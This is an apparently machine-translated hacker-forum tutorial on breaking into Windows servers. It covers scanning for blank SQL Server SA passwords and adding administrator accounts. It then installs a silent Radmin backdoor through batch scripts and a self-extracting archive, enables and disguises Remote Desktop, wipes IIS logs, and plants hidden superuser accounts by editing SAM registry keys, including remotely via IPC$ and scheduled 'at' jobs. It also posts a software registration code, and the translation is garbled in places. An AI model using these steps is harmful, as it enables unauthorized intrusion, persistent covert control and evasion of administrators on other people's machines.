침입 소프트웨어
SA 빈 암호 침입 3389 터미널 전체 제품군.
작성자: fib 웹 출처: 오리지널 업데이트 시간: 2006 년 5 월 2 일 브라우징 수: 40
도구: WINNTAutoAttack 자동 공격자 (취약점 제거)
SQLTOOLS(SA null 암호 커넥터)
RAMDIN Shadow 3.0 중국어 버전 (원격 제어 프로그램)
RADMIN 등록 코드:
08us 9a95i+lka 9 nbolxqv 0 V8 xqdvkgcnctpn 2 wv11isqocvua 6 a5k zrhc 5 gvmiybwomk 6 rnw OJ 8 myy 8 lxr fi 22
SC.exe 항. 박쥐 query.exe 숨어 플러그. Exe (3389 서비스 숨기기 및 관리자가 자체 프로세스를 찾지 못하도록 방지)
CleanIISLog.exe (소형 PP 와이프 프로그램)
3389.exe (포트 3389 서비스용)
Psu.exe (과거에 금지된 게스트 계정 사용)
Mstsc.exe (원격 데스크톱 연결 프로그램)
다운로드 (다운로드 도구에서 마우스 오른쪽 버튼 클릭)
I. SA 약한 암호로 스캔 ... (자동 공격자)
2. SQLTOOLS 에 연결하여 사용자를 구성합니다.
Net start telnet telnet 이 telnet 서비스를 엽니다.
Net 사용자 mint mint/add add 사용자 mintpassword 를 mint 로 추가합니다.
Net 로컬 그룹 administrator mint/add 는 계정 mint 를 administrator 로 업그레이드합니다.
3. 후문 프로그램 RAD 업로드. EXE(RADMIN 서버 자동 압축 해제 프로그램).
RAD 제작 과정. EXE:
1, Radmin 설치 디렉토리에서 AdmDll.dll, raddrv.dll 및 r_sever.exe (신규
2. 로컬에서 서버를 설정합니다 (생성해야 함)
암호 설정-> & gt 연결 포트 설정 (기본값 4489)-> & gt;; 생성
3. 내보낸 레지스트리 HKEY 로컬 시스템 키 값은 1.reg 입니다
4. u.bat 라는 배치 프로세스를 작성합니다
--
@ 에코 끄기
네트워크 중지 r _ 서버
--
5. 다음과 같이 두 번째 r.bat 배치를 작성합니다
--
@ 에코 끄기
@ explorer. exe/ 언로드/음소거
@Explorer.exe /install /silence
@regedit /s 1.reg
@ 에코 끄기
@ explorer. exe/ 언로드/음소거
@Explorer.exe /install /silence
@regedit /s 1.reg
@net start r_server
@ rad.exe
@del 1.reg
@del r.bat
@del u.bat
--
6. admdll.dll raddrv.dllexplorer.exe (r _ sever.exe 로 이름 변경) u.bat r.bat 를 r.bat 압축 패키지로 압축합니다.
7. Rad.rar 을 자동 압축 해제 파일로 만듭니다.
Default.sfx-> 의 자체 게시 모듈을 선택합니다. & gt 고급 자동 해제 옵션
-> & gt 루틴
게시 경로: %systemroot%\system32
설치 프로그램: 출시 후 실행: r.bat 가 출시되기 전에 u.bat 를 실행합니다.
-> & gt 터치 유형
자동 모드: 모든 중첩 모드 숨기기: 모든 파일을 덮어씁니다
-> & gt 좋아요-> 물론>
생성 완료
4. RADMIN 고객 서비스 터미널을 연결합니다. ....
C: \ winnt 에 파일 업로드 (XP 는 windows 임):
Port.bat (XP 인 경우 ... WINNT 를 윈도우로 변경해야 함)
Query.exe· quser.exe
SC.exe
CleanIISLog.exe.exe
3389.exe
Psu.exe
반등 뒷문을 하나 더 올리는 게 좋을 것 같아요.
RADMIN 이 TELNET 으로 들어갑니다.
C:\ win nt \ 3389.exe 를 실행합니다.
육계를 다시 시작하다
5. 재부팅 후 원격 데스크톱 원격 장치에 연결합니다.
여기에 때때로 문제가 생길 수 있다. .....
3389 를 사용하여 로그인합니다. 로그인 사용자가 꽉 찼습니다. 두려워하지 마라. 우리는 그를 내쫓았다.
텔넷 다른 IP. 발견에는 NTLM 인증이 필요합니다.
우리는 자신의 컴퓨터에 계정을 설정했습니다. mint 암호는 mint 이고 우리는 관리자입니다.
C:\winnt\system32\cmd.exe 를 찾아 바탕 화면에 대한 바로 가기를 만듭니다.
Cmd 의 바로 가기 등록 정보를 수정하여 다른 id 로 로그인할 수 있도록 합니다.
그런 다음 바탕 화면에서 cmd.exe 에 대한 바로 가기를 실행합니다. 계좌번호와 비밀번호를 입력하세요.
텔넷 상대방의 IP. 상대방의 컴퓨터에 직접 로그인할 수 있다.
명령을 사용합니다
C:\ 사용자 조회 (상대방의 현재 터미널 로그인 상태 보기. ) 을 참조하십시오
명령을 실행합니다
C:\logoff 1 (관리자 한 명을 쫓아내다)
C:\query user 로 다시 한 번 ~ ~ (이것이 바로 1.bat 를 사용하지 않는 이유입니다.)
6. 연결 후 .. cmd 에서 실행합니다.
C:\winnt\log 입니다. 자체 IP 가 있습니다. (PP 닦기)
C:\winnet\ 1.bat (현재 온라인 사용자 파일을 보려면 오버레이 삭제)
작성자: 125.90.34. 이 강연에 회답하다.
--
2 SA null 암호 침입 3389 전체 시리즈 종료
일곱. SA 공백 암호 패치
프로그램-> & gtMicrosoft SQL Server-& gt;; Gt 쿼리 분석기 (돋보기 포함)
-> & gtWindowst 인증 로그인
코드 복사: 셀미스
--
있는 경우 (* from 선택)
여기서 id 는 object _ id (n' [dbo]) 입니다. [xp_cmdshell]') 및
OBJECTPROPERTY(id, N'IsExtendedProc') = 1)
Exec sp_dropextendedproc N'[dbo].' [xp_cmdshell]'
가다
--
F5 (실행) 를 누릅니다
SQL Server 를 종료하고 종료한 다음 다시 SQL Server 인증을 사용하십시오. 종료 (이것은 기록을 남기지 않기 위한 것입니다).
여덟. 포트 3389 및 서비스 이름 변경
서버측 포트 설정을 수정합니다. 레지스트리에는 수정해야 할 두 곳이 있습니다.
[HKEY _ local _ machine \ system \ currentcontrolset \ control \ terminalserver \ WDS \ rdpwd \ to
기본적으로 포트 번호 값은 3389 입니다. 10 을 선택하여 원하는 포트로 수정합니다 (예: 13 14).
2 위:
[HKEY _ local _ machine \ system \ current control set \ control \ terminal server \ winstations \ RDP]
기본적으로 포트 번호 값은 3389 입니다. 10 을 선택하여 원하는 포트로 수정합니다 (예: 13 14).
새 포트에 연결하려면 시스템을 다시 시작해야 합니다. "걱정 마 ... 그의 서비스 이름 변경 및 시스템 재부팅"
3389 서비스 수출
[HKEY _ local _ machine \ system \ currentcontrolset \ services \ termservice]
키 값은 mm.reg 파일입니다.
Mm.reg 파일을 편집합니다. $ TermService 를 Alerter 로 대체 (오류 경고 서비스 ... 다른 서비스도 허용됨)
그런 다음 "설명" = (서비스 설명 ... 변경된 서비스 설명 ... 선택한 사용자와 컴퓨터에 시스템 관리 수준에 대한 알림 메시지입니다. ) "
"display name" = "11 번째 줄 (여기 서비스 이름 ... 변경한 서비스 이름으로 변경 ... 여기 경보기가 있음).
구조 .. 그런 다음 레지스트리를 가져옵니다 (여기서는 먼저 Services.msc (CMD 에서 이 명령을 입력할 수 있음) 서비스 관리자 ... 먼저 경보기 서비스를 중지해야 합니다)
그런 다음 CMD 에서
CD c:\winnt\system32
Termsrv.exe 서비스를 복사합니다. Exe (이것은 termsrv.exe 에서 복사한 사이렌 서비스에 대한 유사한 파일 이름을 가진 파일입니다.)
CD C:\winnt
Sc \ \ 127. 0. 0. 1 사이렌 구성 binpath = c: \ winnt \ system32 \ service .. 서비스 이름은 대/소문자를 구분해야 하고, a 는 대문자여야 합니다.
9. 취소 후 (취소는 직접 전원을 끄는 것보다 낫다) ... Radmin 으로 육계를 다시 시작합니다. .....
10. 비활성화된 계정 [게스트] 을 사용하여 로그인합니다. 생성한 계정을 삭제합니다.
1. psu.exe 를 사용하여 레지스트리 확장
Hkey _ local _ machine \ Sam \ Sam \ domain \ account \ users
사용법: [psu -p regedit -i pid]
Pid 의 값은 작업 표시줄의 빈 공간에서 마우스 오른쪽 버튼을 클릭하는 것입니다-> & gt 작업 관리자-> >; 세션 중 winlogon.exe 뒤의 값은 PID 값입니다.
예를 들어 PSU–p regedit–I157 이 있습니다.
게스트 권한을 관리자 권한으로 변환
관리자 권한을 생성하는 방법:
HKEY 로컬 컴퓨터 \ Sam \ Sam \ domain \ account \ user \ name \ administrator 의 유형 값을 찾았습니다.
Hkey _ local _ machine \ Sam \ Sam \ domains \ account \ users \ 에서 이 유형의 값을 찾아 f 라는 값을 복사하여 해당 게스트 유형 값을 덮어씁니다
게스트 가상 머신 구성을 내보내고 (즉, HKEY _ local _ machine \ Sam \ domain \ account \ user \ Guest 가상 머신 및 해당 유형 값에 대한 데이터 내보내기) 게스트 가상 머신 구성을 삭제합니다.
2. 컴퓨터 관리에서 계정 목록 새로 고침을 확인합니다. 이 시점에서 오류 [계정을 찾을 수 없음] (이 단계를 건너 뜀) 가 발생합니다.
3. 게스트 가상 머신 구성 (두 개의 REG 파일을 레지스트리로 가져오기)
4. 게스트 계정의 비밀번호를 수정하고 명령줄에서 게스트 계정을 비활성화합니다 [반드시 명령줄에 있어야 함]
Net 사용자 게스트 * * * * * [비밀번호 변경]
네트워크 사용자 게스트/활동: 예
Net 사용자 Guest /active:no[ 명령줄에서 게스트 비활성화]
5. 실험 금지 계좌 손님 사용 가능 여부.
6. 손님이 로그인한 후 생성한 계정을 삭제합니다.
순 사용자 mint /del
전체 과정이 끝났다
마지막으로 라드밍의 서비스를 바꾸는 게 좋을 것 같아요 .. 뒷문과 길을 많이 남겨주세요 .. ㅋㅋㅋㅋㅋㅋㅋㅋㅋㅋㅋㅋㅋㅋ
전체 과정이 끝났습니다 .. 이 기계는 정말 당신의 육계가 될 것입니다. ...
문장 속 내용은 모두 아래 애니메이션의 내용이다. (자신의 이해를 통해 쓴 ... 많은 실수가 있을 수 있다 ... 나 같은 신인에게 도움이 되길 바란다.)
작성자: 125.90.34. 이 강연에 회답하다.
--
3 SA null 암호 침입 3389 전체 시리즈 종료
웃음 ☆ "3389 의 끝"
멜빈 생산
고독한 늑대가 달을 바라보고 있다
(그는 또한 (숨겨진 계정 뒷문 자습서) 를 가지고 있습니다. ) 을 참조하십시오
조각
마지막으로, 고정 된 IP 육계를 찾는 방법을 보내십시오.
육계 스캔 확률을 높이는 방법 저자: 인터넷 필사자
먼저 포트 이상 에이전트를 찾으십시오. 저는 보통 인터넷 중독자의 집 (www.52cyq.com) 에 가서 가져갑니다. 좋습니다.
218.58.88.15: 45576 [산둥 칭다오시] (저는 교육망입니다. 외국 기계를 스캔할 수 없기 때문에 국내 IP 를 사용합니다.
나는 그것을 완전한 네트워크 세그먼트로 확장했다. 218.58.88.1-218.58.88.255 에서 2/kloc 로 확장할 수 있습니다
2 18.58.90.255. 애니메이션의 크기를 줄이려면 3389 만 스캔하면 됩니다. IP 가 얼마나 확장되었는지 보세요.
인터넷 속도가 빠릅니까, 아니면 느린가요? 빨리 점을 더 넓히고, 천천히 C 세그먼트 IP 하나만 스캔합니다. 참조 [2 18.58.88.8]:
NT-Server 약한 비밀번호 발견: 관리자/[빈 비밀번호] 육계를 스캔하는 것이 매우 간단합니다. 기억하세요.
나는 여기서 출국할 수 없어서 국내기를 스캔한다. 네가 스캔하는 것은 외국 기계이지 국산이 아니다 ~
무슨 일이 생기면 경찰이 너를 찾을 것이다. 좋아요. 스캔은 여기서 끝납니다.
수퍼유저 관리자로 터미널 서비스로 육계에 로그인한다고 가정해 봅시다. 먼저 명령줄 또는 계정 관리자에서 계정을 설정합니다. hacker$. 여기서는 명령줄 아래에 이 계정을 설정했습니다.
인터넷 사용자 해커 $ 1234 /add
2. 시작/실행에 regedt32.exe 를 입력하고 enter 키를 눌러 regedt32.exe 를 실행합니다.
3. 권한을 클릭하여 창을 엽니다.
보안 막대에 로그인하면 "추가" 를 클릭하여 계정을 추가합니다. 여기서는 관리자로 로그인했기 때문에 관리자를 추가하고 권한을' 전체 제어' 로 설정하겠습니다. 여기에 설명이 필요합니다: 계정이나 계정이 속한 그룹을 추가하는 것이 가장 좋습니다. 원래 계정이나 그룹을 수정하지 마십시오. 그렇지 않으면 일련의 불필요한 문제가 발생할 수 있습니다. 숨겨진 수퍼유저가 설정되면 여기에서 추가한 계정을 삭제합니다.
4. 시작 → 실행을 클릭하고 "regedit.exe" 를 입력하여 레지스트리 편집기 regedit.exe 를 시작합니다.
키 열기: HKEY _ local _ maichine \ Sam \ Sam \ domains \ account \ user \ names \ hacker $ "
5. 프로젝트 hacker$, 00000409,000001F4 를 hacker.reg, 409.reg, 1f4.reg 로 내보냅니다
6. 명령줄에서 net user hacker$ /del 을 실행하여 사용자 hacker$: net user hacker$ /del 을 삭제합니다.
7. regedit.exe 창에서 F5 키를 눌러 새로 고친 다음 파일-레지스트리 파일 가져오기를 클릭하여 수정된 hacker.reg 를 레지스트리로 가져옵니다.
8. 이 시점에서 숨겨진 수퍼 유저 hacker$ 가 구축되고 regedit.exe 가 닫힙니다. Regedt32.exe 창에서 HKEY_LOCAL_MACHINE\SAM\SAM key 의 권한을 원래 모양으로 다시 변경합니다 (추가된 계정 관리자만 제거하면 됨).
9. 참고: 숨겨진 수퍼유저가 설정되면 계정 관리자에서 해커 $ 를 볼 수 없고 명령줄에서' net user' 명령을 사용할 수도 없지만 수퍼유저가 설정되면 비밀번호를 수정할 수 없습니다. Net user 명령을 사용하여 hacker$ 의 비밀번호를 변경하면 계정 관리자에 숨겨진 수퍼유저가 다시 표시되며 삭제할 수 없습니다.
명령줄에서 숨겨진 수퍼유저를 원격으로 설정하는 방법
At 의 명령은 at 가 생성한 계획 작업이 하나의 시스템으로 실행되기 때문에 psu.exe 프로그램이 필요하지 않습니다. At 명령을 사용하려면 육계에 계획 서비스가 있어야 합니다. 그렇지 않은 경우 netsvc.exe 또는 sc.exe 에서 제공하는 도구를 사용하여 원격으로 시작할 수 있습니다. 물론 일정 서비스를 시작할 수 있는 한 이 방법도 사용할 수 있다.
명령줄 모드의 경우 SQLexec 를 사용하여 MSSQL 포트 1433 에 연결하거나 telnet 서비스를 사용하여 cmdshell 을 얻을 수 있는 한 at 명령을 실행할 수 있는 권한을 가진 등 다양한 연결 방법을 사용할 수 있습니다.
1, 먼저 육계를 찾으세요. 찾는 방법에 대해서는 제가 여기서 말하는 주제가 아닙니다. 수퍼유저가 관리자이고 비밀번호가 12345678 인 육계를 찾았다고 가정해 봅시다. 이제 명령줄에서 원격으로 숨겨진 수퍼유저를 설정하기 시작합니다. (이 예제의 호스트는 내 LAN 의 호스트입니다. 나는 그것의 IP 주소를 13.50.97.238 로 바꿨다. 정상적인 IP 주소를 방해하지 않도록 인터넷에 서명하지 마세요. ) 을 참조하십시오
작성자: 125.90.34. 이 강연에 회답하다.
--
4 SA null 암호 침입 3389 전체 시리즈 종료
2. 먼저 육계와의 연결을 설정합니다. 명령은 netuse \ \13.50.97.238 \ IPC $ "12345678" 입니다
3. at 명령을 사용하여 육계에 사용자를 설정합니다 (at 서비스가 시작되지 않은 경우 소융의 netsvc.exe 또는 sc.exe 를 통해 원격으로 시작할 수 있음): at \13.50.97.238/
C:\winnt\system32\net.exe 사용자 해커 $ 1234 /add
$ 기호가 있는 사용자 이름은 $ 기호가 추가된 후 명령줄에서 net user 를 사용하면 표시되지 않지만 계정 관리자에서 볼 수 있기 때문입니다.
4. at 명령을 사용하여 HKEY _ local _ machine \ Sam \ Sam \ domain \ account \ 사용자의 키 값을 내보낼 수도 있습니다. at \ \13.50.97.238
C: \ winnt \ regedit.exe/ehacker.reg HKEY _ local _ machine \ Sam \ Sam \ domains \ account
/e 는 regedit.exe 의 매개 변수이며, _ local _ machine \ Sam \ Sam \ domains \ account \ users \ 의 key 는 \ 로 끝나야 합니다 필요한 경우 "c: \ winnt \ regedit.exe/ehacker.reghkey _ local _ machine \ Sam \ Sam \ domains \" 를 따옴표로 묶을 수 있습니다
5. 육계의 hacker.reg 를 로컬에 다운로드하고 메모장으로 열어 편집한다. 명령은 copy \ \13.50.97.238 \ admin $ \ system32 \ hacker.reg 입니다.
C:\hacker.reg
수정된 방법은 그래픽계에 이미 소개되었으니 여기서는 소개하지 않겠습니다.
6. 편집한 hacker.reg 를 육계 사본 c: \ hacker.reg \ \13.50.97.238 \ admin $ \ syssy 에 다시 복사합니다
7. 육계 시간 확인: net time \\ 13.50.97.238 그런 다음 at 명령을 사용하여 사용자 hacker$:
At \ \13.50.97.23813: 40 네트워크 사용자 해커 $ /del
8. hacker$ 가 제거되었는지 확인: 사용
순 사용 \\ 13.50.97.238 /del 육계에서 분리.
Netuse \ \13.50.97.238 \ IPC $ "1234"/사용자: "hacker$";
9. 육계에 다시 연결: netuse \ \13.50.97.238 \ IPC $ "12345678"/사용자
육계 시간을 다시 가져오고 at 명령을 사용하여 육계 레지스트리로 다시 복사된 hacker 1.reg 를 가져옵니다.
At \ \13.50.97.23813: 41c: \ winnt \ regeded
Regedit.exe 의 매개 변수 /s 는 조용한 모드를 나타냅니다.
10 그런 다음 해커 $ 가 삭제되었는지 확인하는 것과 같은 방법으로 해커 $ 가 설정되었는지 확인합니다.
1 1. 사용자 hacker$ 에게 읽기 및 쓰기 및 삭제 권한이 있는지 다시 확인합니다. 안심하지 않으면 다른 계좌를 만들 수 있는지 확인할 수도 있습니다.
12, 1 1 을 통해 사용자 hacker$ 가 루트 권한을 가지고 있다고 판단할 수 있습니다. 처음에는 at 명령을 사용하여 일반 사용자로 설정했지만 지금은 원격 읽기 및 쓰기 삭제 권한을 가지고 있기 때문입니다.
3. 육계는 3389 터미널 서비스를 열지 않습니다. 명령줄을 사용하고 싶지 않으면 어떻게 합니까?
이 경우 인터페이스를 사용하여 육계에 대한 숨겨진 수퍼유저를 원격으로 설정할 수도 있습니다. Regedit.exe 와 regedt32.exe 모두 네트워크 레지스트리에 연결할 수 있으므로 regedt32.exe 를 사용하여 원격 호스트의 레지스트리 키에 대한 권한을 설정하고 regedit.exe 를 사용하여 원격 레지스트리를 편집할 수 있습니다. 계정 관리자에는 다른 컴퓨터에 연결하는 기능도 있습니다. 계정 관리자를 사용하여 원격 호스트의 계정을 생성 및 삭제할 수 있습니다. 구체적인 단계는 위에서 설명한 것과 비슷하며, 더 이상 말하지 않고, 그 속도만 말하는 것은 정말 참을 수 없다.
그러나 두 가지 전제 조건이 있습니다: 1 먼저 net use \\ 육계 ip\ipc$ "password" /user: "수퍼 사용자 이름" 을 사용하여 원격 호스트에 대한 연결을 설정한 다음 regedit 을 사용합니다
2. 원격 호스트는 원격 등록 서비스를 열어야 합니다. 그렇지 않은 경우 슈퍼유저 비밀번호가 있기 때문에 원격으로 열 수도 있습니다.
넷째, 비활성화된 계정을 사용하여 숨겨진 계정 설정:
육계에서 사용자 금지를 사용하여 숨겨진 우수 사용자를 만들 수 있습니다. 이 방법은 다음과 같습니다.
1. 세심한 관리자가 금지한 사용자를 가능한 한 찾아내십시오. 일반적으로 일부 관리자는 보안을 위해 일반적으로 게스트를 비활성화하고 다른 사용자를 비활성화합니다. 그래픽 인터페이스에서는 계정 관리자에서 비활성화된 계정에 빨간색 포크가 있는 한 매우 쉽습니다. 명령줄 아래에서 아직 좋은 방법을 생각해 내지 못했다. 명령줄 아래의 "net user username" 명령만 사용하여 사용자의 비활성화 여부를 하나씩 확인할 수 있습니다.
여기서는 사용자 하커가 관리자에 의해 비활성화되었다고 가정합니다. 우선, 작은 용량의 뛰어난 사용자 클론 프로그램 클론을 사용하여 사용자 hacker 를 수퍼유저로 복제합니다 (복제 후 사용자 hacker 를 비활성화하면 자동으로 활성화됨): clone IP 관리자 루트 암호 hacher hacher 비밀번호.
작성자: 125.90.34. 이 강연에 회답하다.
--
5 SA null 암호 침입 3389 전체 시리즈 종료
3. 현재 shell 이 있는 경우 (예: 텔넷 서비스 또는 SQLEXEC 을 통해 육계에 연결된 msSQL 의 기본 포트 1433 을 통해 얻은 셸) 명령만 입력하면 됩니다.
Net 사용자 해커 /active: 그렇지 않으면 사용자 해커가 비활성화됩니다 (최소한 표면적으로는). 물론 사용자 hacker 를 다른 비활성화 사용자로 변경할 수도 있습니다.
4. 이때 그래픽 인터페이스 아래의 계정 관리자에 있는 사용자를 보면 사용자 해커가 비활성화된 것을 알 수 있습니다. 하지만 사실입니까? 육계를 이 장애인 사용자와 연결시켜 연결할 수 있는지 확인해 주시겠습니까? 명령 사용: net 사용자 \ \ 육계 ip\ipc$ "해커 암호"/사용자: "해커" 를 보세요. 여러 번의 실험을 통해 매번 성공할 수 있고 슈퍼유저 권한이라고 말씀드릴 수 있습니다.
5. cmdshell 없이 어떻게 합니까? 위에서 설명한 at 명령을 사용하여 사용자 해커를 비활성화할 수 있습니다. 명령 형식: at \\ 육계 IP 타임 네트워크 사용자 해커/활성: 아니오
6. 원칙: 구체적이고 깊은 원리는 내가 말할 수 없고, 가장 간단한 말으로만 말할 수 있다. 그래픽 인터페이스 아래의 계정 관리자에서 루트 관리자를 비활성화하면, 루트 관리자를 계속 비활성화할 수 없는 대화 상자가 나타납니다. 마찬가지로 복제 시 레지스트리의 hacker' f' 키가 레지스트리의 수퍼사용자 administrator' f' 키로 대체됩니다. 그래서 해커는 슈퍼유저 권한을 가지고 있지만 레지스트리의' C' 키는 여전히 원래의' C' 키로 남아 있어 해커는 여전히 비활성화된다. 그러나 슈퍼유저 권한은 비활성화되지 않기 때문에 비활성화된 사용자 해커는 여전히 육계에 연결할 수 있고 여전히 슈퍼유저 권한을 가지고 있다. 구체적으로 잘 모르겠으니 한번 알아보자.
동사 (verb 의 약어) 몇 가지 고려 사항:
1. 숨겨진 수퍼유저가 설정되면 계정 관리자 또는 명령줄에서 이 사용자를 볼 수 없지만 이 사용자는 존재합니다.
2. 숨겨진 수퍼유저가 설정되면 비밀번호를 변경할 수 없습니다. 비밀번호를 변경하면 숨겨진 수퍼유저가 계정 관리자에 노출되어 삭제할 수 없기 때문입니다.
3. 이 컴퓨터에서 테스트할 때 시스템과 함께 제공된 백업 도구를 사용하여 이 컴퓨터의' 시스템 상태' 를 백업하는 것이 가장 좋다. 주로 레지스트리의 백업이다. 내가 실험을 할 때 계정 관리자에서 사용자나 그룹을 볼 수 없다는 현상이 있기 때문이다. 하지만 확실히 존재한다. 다행히 백업이 있어서 다행이에요. ᄏᄏ SAM key 는 결국 시스템에서 가장 민감한 부분이다.
4. 이 방법은 2000/XP 에서 테스트를 통과했지만 NT 에서는 통과하지 못했습니다. 이 방법은 연구 전용입니다. 이런 방법으로 파괴하지 마세요. 만약 이런 방법이 심각한 결과를 초래하면, 사용자가 책임지고, 나는 책임지지 않는다.